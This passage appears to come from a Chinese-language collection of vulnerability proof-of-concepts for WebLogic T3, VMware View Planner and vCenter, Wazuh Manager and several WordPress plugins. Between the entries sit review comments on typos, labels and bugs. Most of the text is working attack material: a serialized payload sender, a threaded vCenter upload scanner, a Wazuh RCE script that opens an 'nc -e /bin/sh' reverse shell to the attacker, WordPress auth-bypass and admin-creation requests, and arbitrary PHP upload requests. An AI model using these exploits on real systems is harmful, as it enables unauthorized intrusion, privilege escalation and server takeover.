5\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x5
4\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
# adjust header for appropriate message length
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
```
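Review bot: both 漏洞描述 paragraphs have lost their punctuation (`...比较好用的漏洞weblogic针对该漏洞的解决方案就是不断填充黑名单在高版本jdk下配合jep290机制...` reads as a single run-on); restore commas and full stops before merging. The Java block opens with a bare fence while `weblogic_t3.py` is tagged `py`; tag the first block `java`. The Python script is Python 2 (`print 'Usage: ...'`, `print >>sys.stderr, ...`) whereas the other PoCs in this commit are Python 3, so state that in the heading. The Java sample hardcodes `T3ProtocolOperation.send("192.168.65.128", "7001", ...)`; label that as a lab address the reader must replace rather than leaving it to look like part of the technique.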

View File

@ -0,0 +1,35 @@
# VMware View Planner 未授权RCE CVE-2021-21978
## 漏洞描述
输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件从而导致在logupload容器中远程执行代码。
参考链接:
- https://www.vmware.com/security/advisories/VMSA-2021-0003.html
## 漏洞复现
poc
```
POST /logupload?logMetaData={"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}
Accept-Encoding:gzip,deflate
Content-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition:form-data;name="logfile";filename=""
Content-Type:text/plain
#! /usr/bin/env python3
import cgi
import os,sys
import logging
import jsom
....
```
![image-20221207141859357](images/image-20221207141859357.png)
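Review bot: this entry has no `## 漏洞影响` section, unlike the vCenter and Wazuh files in the same commit; add the affected View Planner versions from the linked advisory VMSA-2021-0003 so readers can check exposure without leaving the page. The embedded upload body also contains `import jsom` (presumably `json`) and ends in `....`; either correct the typo or state that the body is shown truncated, so nobody copies it as a complete file.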

View File

@ -0,0 +1,33 @@
# VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
## 漏洞描述
VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。
参考链接:
* https://kb.vmware.com/s/article/82374
* https://twitter.com/osama_hroot/status/1365586206982082560
## 漏洞影响
```
vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0
Cloud Foundation: before 3.10.1.2, 4.2
```
## 漏洞复现
poc
```
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
HOST:
vcIP: SSRF
vcUsername:sa
vaPassword:sa
reqResource:sa
...
```
![image-20221207141353136](images/image-20221207141353136.png)
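Review bot: the request headers mix two prefixes, `vcUsername:sa` and `vaPassword:sa`, which looks like an inconsistency to confirm against the referenced write-up, and `HOST:` is left empty, so the sample is not a replayable request as written; either fill the placeholders consistently (`HOST: <target>`, `vcIP: <ssrf target>`) or say explicitly that `SSRF` and `sa` are placeholders. The 漏洞影响 list is useful; consider adding the fixed builds from KB 82374 beside it.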

View File

@ -0,0 +1,162 @@
# VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
## 漏洞描述
由于对 vSphere vCenter Server中用户提供的输入的验证不足因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。
参考链接:
- https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/
- https://swarm.ptsecurity.com/unauth-rce-vmware/
- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
## 漏洞影响
```
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
```
## FOFA
```
app="vmware-vCenter"
```
## 漏洞复现
漏洞路径:
```
https://target/ui/vropspluginui/rest/services/uploadova
POST: name="uploadFile"; filename="xxx.tar"
```
构造POST包上传tar文件
![](images/16142224147525.jpg)
Linux可以直接创建../../home/vsphere-ui/.ssh/authorized_keys TAR文件 后直接SSH连Windows可以直接写入webshell。
批量检测脚本:
- https://raw.githubusercontent.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/main/CVE-2021-21972.py
```python
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/25 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import argparse
import http.client
import urllib3
import base64
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
# proxies = {"scoks5": "http://127.0.0.1:1081"}
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
headers = {
'User-Agent': get_ua()
}
# data = base64.b64decode(Payload)
# files = {'uploadFile': open('all.tar', 'rb')} #linux
files = {'uploadFile': open('test.tar', 'rb')} #win
targetUrl = url + TARGET_URI
try:
res = requests.post(url=targetUrl,
headers=headers,
files=files,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
if res.status_code == 200 and "SUCCESS" in res.text:
print("[+] URL:{}--------存在CVE-2021-21872漏洞".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("存在漏洞地址.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " 没有发现CVE-2020-14882漏洞.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-t",
# "--tar",
# help="Create tar File; Example:test.tar")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
# jsp = args.tar
# if jsp != None:
# print(jsp)
# generate_zip(jsp)
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # 默认15线程
if __name__ == "__main__":
main()
```
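Review bot: the result messages in `CVE_2021_21972` name the wrong CVEs: the hit branch prints `存在CVE-2021-21872漏洞` and the miss branch prints `没有发现CVE-2020-14882漏洞`, both apparently left over from another script, so anyone triaging the console output or the `存在漏洞地址.txt` file is told about a different vulnerability than the one tested; both strings should say CVE-2021-21972. Two smaller points in the same function: `proxies` is hard-wired to `127.0.0.1:8080`, and the bare `except:` then reports any failure (including no proxy listening) as a generic `Request ERROR`, so a target can be logged as unreachable when it was never contacted; log the exception and make the proxy optional. The comment `# 默认15线程` on `multithreading(file_path, 10)` also disagrees with the value actually passed.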


@ -0,0 +1,151 @@
# Wazuh Manager 代码执行漏洞CVE-2021-26814
## 漏洞描述
Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。
## 漏洞影响
```
Wazuh Manager v.4.0.0-4.0.3
```
## 漏洞复现
poc
```
PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip
DESTIP -tport DESTPORT
```
```python
# Exploit Title: Wazuh 4.0.3 API RCE
# Author: WickdDavid (Davide Meacci)
# Date: 2021-01-01
# Vendor Homepage: https://github.com/wazuh/wazuh
# Version : 4.0.3
import requests
import sys
import argparse
import time
import json
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')
parser.add_argument('-user', dest='username',required=True,
help='wazuh API username')
parser.add_argument('-pwd', dest='password',required=True,
help='wazuh API password')
parser.add_argument('-lip', dest='srcip',required=True,
help='listening server')
parser.add_argument('-lport', dest='srcport',required=True,
help='listening port')
parser.add_argument('-tip', dest='destip',required=True,
help='target server ip (wazuh API)')
parser.add_argument('-tport', dest='destport',required=True,
help='target server port (wazuh API)')
args = parser.parse_args()
# executed payload may be changed here
exec_payload = """
import os #:l
os.system("nc %s %s -e /bin/sh") #:l
""" % (args.srcip, args.srcport)
config_payload = { "drop_privileges": False }
proxies = {
"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080"
}
target = "https://%s:%s" % (args.destip,args.destport)
auth_token = ""
path_traversal = "etc/lists/../../../../.."
headers = {}
# step 1 - obtaining auth token
r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False)
if(r.status_code == 200):
auth_token = r.text
headers["Authorization"] = "Bearer %s" % auth_token
else:
print("[!] No auth code recovered. Check username and password")
exit(1)
# step 2 - Privilege Escalation on API (not implemented)
# step 3 - Save files to be restored later
file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py"
print("[+] Saving files to restore later...")
r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)
f = open("backup.py","w")
f.write(json.loads(r.text)["contents"])
f.close()
time.sleep(1)
# step 4 - Local Privilege Escalation
print("[+] Changing API config to run as root...")
r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False)
time.sleep(1)
# step 5 - Restart server (now api service runs as root)
print("[+] Restarting server...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload
print("[+] Uploading payload...")
r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)
#print(r.text)
time.sleep(1)
# step 7 - Restart server (now malicious payload will be run by the server)
print("[+] Restarting API service for the last time...")
r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False)
#print(r.text)
data = {"title":"Bad Request"}
while "title" in data and "Bad request" in data["title"]:
time.sleep(5)
try:
r = requests.get("%s/manager/status" % target, headers = headers, verify=False)
#print(r.text)
data = json.loads(r.text)
except:
continue
print("[+] Payload executed, check your shell now.")
print("[+] Remember to restore changed file (check local backup file)")
```
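Review bot: the two wait loops in the PoC (after each `/manager/restart`) never execute: `data` is seeded with `{"title":"Bad Request"}` but the condition tests for `"Bad request"` with a lower-case r, so the case-sensitive `in` check is false on the first pass and the script moves on without ever polling `/manager/status`; the only thing holding it back is `wait_for_complete=true` on the restart call. `proxies` is also defined but never passed to any request, so it is dead code. On the documentation side, 漏洞描述 should state plainly what the script does to the target, since it is not a read-only probe: it sets `drop_privileges: False` through `/manager/api/config`, overwrites `/var/ossec/api/scripts/wazuh-apid.py`, and restarts the manager twice, with the local `backup.py` as the only copy of the original file. The heading `代码执行漏洞CVE-2021-26814` is also missing the space before the CVE id that the other entries use.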


@ -0,0 +1,42 @@
# WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
## 漏洞描述
未经身份验证的用户可以使用"theplus_ajax_login"和"theplus_google_ajax_register" Ajax请求通过仅提供相关的用户名就可以像任何用户一样轻松地进行身份验证。
参考链接:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175
- https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89
## 漏洞影响
```
Elementor Page Builder <4.1.7
```
## 漏洞复现
poc
```
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
```
"theplus_google_ajax_register" AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的帐户例如admin然后登录。
html
```html
<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="test@example.com" name="email" type="text">
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>
```
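Review bot: the 漏洞影响 block says `Elementor Page Builder <4.1.7`, but the AJAX actions in the PoC (`theplus_ajax_login`, `theplus_google_ajax_register`) belong to the "Plus" add-on named in the heading, not to Elementor Page Builder itself, so the affected-version line should carry the same product name as the heading or readers will check the wrong plugin's version. The 漏洞描述 sentence is a run-on and should be split into the two facts it carries (the requests are unauthenticated; only a username is needed). The `nonce=a` / `value="any"` values are the detail worth stating in prose: a request to `admin-ajax.php` with one of these actions and an arbitrary nonce is what a log review or WAF rule should look for.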


@ -0,0 +1,41 @@
# WordPress File Manager6.9 RCE CVE-2020-25213
## 漏洞复现
poc
```
curl -ks --max-time 5 -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@/$file_upload" "hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
```
```
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Content-Length: 631
Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801
Connection: close
--------------------------9689147a5989a801
Content-Disposition: form-data; name="reqid"
17457a1fe6959
--------------------------9689147a5989a801
Content-Disposition: form-data; name="cmd"
upload
--------------------------9689147a5989a801
Content-Disposition: form-data; name="target"
l1_Lw
--------------------------9689147a5989a801
Content-Disposition: form-data; name="mtime[]"
1576045135
--------------------------9689147a5989a801
Content-Disposition: form-data; name="upload[]"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--------------------------9689147a5989a801--
```
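Review bot: this entry has no 漏洞描述 or 漏洞影响 section, unlike the other files in this commit, and the heading `File Manager6.9` leaves it ambiguous whether 6.9 is the affected or the fixed version; add both sections with the affected range and the endpoint (`lib/php/connector.minimal.php`) so the entry can be used for triage without running the PoC. In the raw request, `Content-Length: 631` does not match the body shown, and the curl line references an undefined `$file_upload` inside a defanged `hxxps://` URL, so neither can be used as-is; say so or fix them.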


@ -0,0 +1,71 @@
# WordPress SuperForms 4.9 任意文件上传到远程代码执行
## 漏洞描述
SuperForms官方链接https://renstillmann.github.io/super-forms/#/
参考链接:
- https://www.exploit-db.com/exploits/49490
## 漏洞影响
```
All (<= 4.9.X)
```
## Google Dork
```
inurl:"/wp-content/plugins/super-forms/"
```
## 漏洞复现
poc
```
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
<=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"
0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)" <==== inject code extension (.php4)
for example
Content-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
# Uploaded Malicious File can be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .
```
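Review bot: 漏洞描述 contains only the vendor link and no description of the flaw; it should state what the request block shows, namely that the upload handler accepts a client-supplied `accept_file_types` list, so the server-side extension allowlist is controlled by the request, and that uploads are written under `/wp-content/uploads/superforms/<year>/<month>/<id>/`. The raw request mixes annotations (`<=== exploit end point`, `<=======`, `inject extension ...`, `for example`) into the request lines and splits `Content-Type: multipart/form-data;` from its `boundary=` line, so it is not a valid request as shown; move the annotations into prose or `#` comments and keep the header on one line. `u can get <id> from server reply .` should be written out in full.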
